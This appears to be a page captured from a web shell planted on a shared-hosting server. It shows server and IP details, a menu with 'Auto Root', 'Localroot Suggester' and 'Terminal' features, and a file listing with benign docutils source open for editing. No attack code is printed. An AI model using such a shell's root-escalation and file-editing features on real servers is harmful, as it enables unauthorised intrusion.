Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
docutils /
writers /
Delete
Unzip
Name
Size
Permission
Date
Action
html4css1
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
html5_polyglot
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
latex2e
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
odf_odt
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
pep_html
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
s5_html
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
xetex
[ DIR ]
drwxr-xr-x
2017-04-04 16:40
__init__.py
4.56
KB
-rw-r--r--
2017-04-04 16:39
__init__.pyc
4.88
KB
-rw-r--r--
2017-04-04 16:40
_html_base.py
59.86
KB
-rw-r--r--
2017-04-04 16:39
_html_base.pyc
67.4
KB
-rw-r--r--
2017-04-04 16:40
docutils_xml.py
7.51
KB
-rw-r--r--
2017-04-04 16:39
docutils_xml.pyc
7.03
KB
-rw-r--r--
2017-04-04 16:40
manpage.py
34.82
KB
-rw-r--r--
2017-04-04 16:39
manpage.pyc
51.86
KB
-rw-r--r--
2017-04-04 16:40
null.py
450
B
-rw-r--r--
2017-04-04 16:39
null.pyc
778
B
-rw-r--r--
2017-04-04 16:40
pseudoxml.py
772
B
-rw-r--r--
2017-04-04 16:39
pseudoxml.pyc
1.19
KB
-rw-r--r--
2017-04-04 16:40
Save
Rename
# $Id: pseudoxml.py 7320 2012-01-19 22:33:02Z milde $ # Author: David Goodger <goodger@python.org> # Copyright: This module has been placed in the public domain. """ Simple internal document tree Writer, writes indented pseudo-XML. """ __docformat__ = 'reStructuredText' from docutils import writers class Writer(writers.Writer): supported = ('pprint', 'pformat', 'pseudoxml') """Formats this writer supports.""" config_section = 'pseudoxml writer' config_section_dependencies = ('writers',) output = None """Final translated form of `document`.""" def translate(self): self.output = self.document.pformat() def supports(self, format): """This writer supports all format-specific elements.""" return True